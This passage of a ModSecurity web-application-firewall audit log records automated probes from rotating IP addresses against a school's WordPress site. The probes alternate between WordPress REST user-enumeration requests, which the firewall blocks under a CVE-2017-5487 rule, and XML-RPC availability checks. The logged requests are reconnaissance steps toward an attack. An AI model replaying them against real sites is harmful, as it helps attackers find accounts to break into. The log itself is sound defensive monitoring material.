Stopwatch: 1747441432004021 6596 (- - -) Stopwatch2: 1747441432004021 6596; combined=4800, p1=651, p2=3874, p3=38, p4=41, p5=130, sr=82, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d3c5c37-Z-- --10017118-A-- [17/May/2025:07:23:52 +0700] aCfXGBKi5m5upc8uMd6hxgAAANE 103.236.140.4 42732 103.236.140.4 8181 --10017118-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.180 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.180 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --10017118-C-- demo.sayHello --10017118-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --10017118-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441432499396 6558 (- - -) Stopwatch2: 1747441432499396 6558; combined=4776, p1=595, p2=3940, p3=38, p4=43, p5=96, sr=83, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10017118-Z-- --f441c713-A-- [17/May/2025:07:24:21 +0700] aCfXNRKi5m5upc8uMd6hxwAAANI 103.236.140.4 42742 103.236.140.4 8181 --f441c713-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f441c713-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f441c713-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441461884891 3330 (- - -) Stopwatch2: 1747441461884891 3330; combined=1455, p1=514, p2=908, p3=0, p4=0, p5=33, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f441c713-Z-- --a308a957-A-- [17/May/2025:07:24:30 +0700] aCfXPhKi5m5upc8uMd6hyAAAANM 103.236.140.4 42746 103.236.140.4 8181 --a308a957-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a308a957-C-- demo.sayHello --a308a957-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a308a957-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441470558684 5465 (- - -) Stopwatch2: 1747441470558684 5465; combined=4155, p1=533, p2=3409, p3=29, p4=31, p5=91, sr=74, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a308a957-Z-- --0ef9ef29-A-- [17/May/2025:07:24:31 +0700] aCfXPwTOsBn9MSWb6WJt7QAAAJU 103.236.140.4 42748 103.236.140.4 8181 --0ef9ef29-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0ef9ef29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ef9ef29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441471886163 2586 (- - -) Stopwatch2: 1747441471886163 2586; combined=1168, p1=392, p2=749, p3=0, p4=0, p5=27, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ef9ef29-Z-- --39559a56-A-- [17/May/2025:07:24:38 +0700] aCfXRnyxdQCiyU1ENFcm4QAAAAQ 103.236.140.4 42754 103.236.140.4 8181 --39559a56-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39559a56-C-- demo.sayHello --39559a56-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39559a56-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441478095269 5693 (- - -) Stopwatch2: 1747441478095269 5693; combined=4158, p1=558, p2=3378, p3=32, p4=35, p5=92, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39559a56-Z-- --81cca46e-A-- [17/May/2025:07:25:22 +0700] aCfXcnyxdQCiyU1ENFcm5AAAAAo 103.236.140.4 42764 103.236.140.4 8181 --81cca46e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.255 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --81cca46e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81cca46e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441522609080 2856 (- - -) Stopwatch2: 1747441522609080 2856; combined=1492, p1=490, p2=971, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81cca46e-Z-- --9d46d846-A-- [17/May/2025:07:25:28 +0700] aCfXeATOsBn9MSWb6WJt7gAAAJY 103.236.140.4 42768 103.236.140.4 8181 --9d46d846-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.255 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.255 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d46d846-C-- demo.sayHello --9d46d846-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d46d846-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441528278019 5098 (- - -) Stopwatch2: 1747441528278019 5098; combined=3771, p1=478, p2=3077, p3=31, p4=26, p5=93, sr=86, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d46d846-Z-- --97285742-A-- [17/May/2025:07:25:29 +0700] aCfXeXyxdQCiyU1ENFcm5gAAAAw 103.236.140.4 42770 103.236.140.4 8181 --97285742-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97285742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97285742-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441529377027 2859 (- - -) Stopwatch2: 1747441529377027 2859; combined=1184, p1=435, p2=720, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97285742-Z-- --3ea6591d-A-- [17/May/2025:07:25:35 +0700] aCfXf3yxdQCiyU1ENFcm6AAAABA 103.236.140.4 42776 103.236.140.4 8181 --3ea6591d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.214 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ea6591d-C-- demo.sayHello --3ea6591d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ea6591d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441535491772 5121 (- - -) Stopwatch2: 1747441535491772 5121; combined=3862, p1=511, p2=3149, p3=28, p4=29, p5=86, sr=71, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ea6591d-Z-- --1b0bae4d-A-- [17/May/2025:07:26:28 +0700] aCfXtBKi5m5upc8uMd6hzAAAANg 103.236.140.4 42784 103.236.140.4 8181 --1b0bae4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b0bae4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b0bae4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441588187175 3070 (- - -) Stopwatch2: 1747441588187175 3070; combined=1280, p1=424, p2=827, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b0bae4d-Z-- --7f5f682a-A-- [17/May/2025:07:26:35 +0700] aCfXuxKi5m5upc8uMd6hzQAAAMA 103.236.140.4 42788 103.236.140.4 8181 --7f5f682a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7f5f682a-C-- demo.sayHello --7f5f682a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f5f682a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441595882111 5208 (- - -) Stopwatch2: 1747441595882111 5208; combined=3890, p1=513, p2=3167, p3=29, p4=32, p5=89, sr=72, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f5f682a-Z-- --220d7707-A-- [17/May/2025:07:27:12 +0700] aCfX4HyxdQCiyU1ENFcm7AAAABU 103.236.140.4 42792 103.236.140.4 8181 --220d7707-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --220d7707-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --220d7707-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441632297965 3276 (- - -) Stopwatch2: 1747441632297965 3276; combined=1451, p1=512, p2=907, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --220d7707-Z-- --0714de22-A-- [17/May/2025:07:27:18 +0700] aCfX5nyxdQCiyU1ENFcm7gAAAAA 103.236.140.4 42796 103.236.140.4 8181 --0714de22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0714de22-C-- demo.sayHello --0714de22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0714de22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441638649834 6508 (- - -) Stopwatch2: 1747441638649834 6508; combined=4723, p1=630, p2=3855, p3=38, p4=42, p5=95, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0714de22-Z-- --ae7a0944-A-- [17/May/2025:07:28:07 +0700] aCfYF3yxdQCiyU1ENFcm7wAAAAE 103.236.140.4 42800 103.236.140.4 8181 --ae7a0944-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae7a0944-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae7a0944-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441687766893 2920 (- - -) Stopwatch2: 1747441687766893 2920; combined=1333, p1=467, p2=836, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae7a0944-Z-- --121e3161-A-- [17/May/2025:07:28:15 +0700] aCfYH3yxdQCiyU1ENFcm8QAAAAM 103.236.140.4 42804 103.236.140.4 8181 --121e3161-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --121e3161-C-- demo.sayHello --121e3161-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --121e3161-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441695844763 5646 (- - -) Stopwatch2: 1747441695844763 5646; combined=4131, p1=559, p2=3342, p3=33, p4=36, p5=96, sr=78, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --121e3161-Z-- --6e5e9f0b-A-- [17/May/2025:07:28:46 +0700] aCfYPnyxdQCiyU1ENFcm8wAAAAY 103.236.140.4 42808 103.236.140.4 8181 --6e5e9f0b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6e5e9f0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e5e9f0b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441726408054 3004 (- - -) Stopwatch2: 1747441726408054 3004; combined=1339, p1=467, p2=841, p3=0, p4=0, p5=30, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e5e9f0b-Z-- --5db8dd4b-A-- [17/May/2025:07:28:53 +0700] aCfYRXyxdQCiyU1ENFcm9QAAAAk 103.236.140.4 42812 103.236.140.4 8181 --5db8dd4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5db8dd4b-C-- demo.sayHello --5db8dd4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5db8dd4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content 